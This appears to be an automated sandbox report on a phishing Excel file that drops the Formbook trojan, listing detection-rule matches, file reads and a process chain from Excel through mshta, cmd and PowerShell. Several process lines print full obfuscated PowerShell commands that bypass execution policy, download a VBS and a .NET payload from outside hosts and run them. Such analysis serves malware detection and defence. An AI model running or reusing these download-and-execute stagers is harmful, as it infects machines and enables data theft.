Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winXLS@31/36@11/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\09230000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8796.tmp

Source: PO#BBGR2411PO69.xls	OLE indicator, Workbook stream: true
Source: 09230000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3...................... .y.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................^k....}..w.... .y.....\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................^k....}..w.... .y.....\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..?T.....&.^k......S.....(.P.....................x....... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....................x.......8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........x.......F.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .y.....}..w.............?T.....&.^k......S.....(.P.....................x...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................ .y.............0........Wl.....}..w............@E......^...............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................ .y......................Wl.....}..w............@E......^...............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....p.......................p.......x........................3......................p...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P..... .......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................<..............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................-).l....}..w.....<......\.......................(.P.....................8...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................-).l....}..w.....<......\.......................(.P.....................8...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.(.^......(.l.....s......(.P............................. .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.............................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................<..............0. ......Wl.....}..w....8.......@E......^...............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................<.......................Wl.....}..w....8.......@E......^...............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m..............................................................3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P............. .......................................

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: PO#BBGR2411PO69.xls

Virustotal: Detection: 7%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 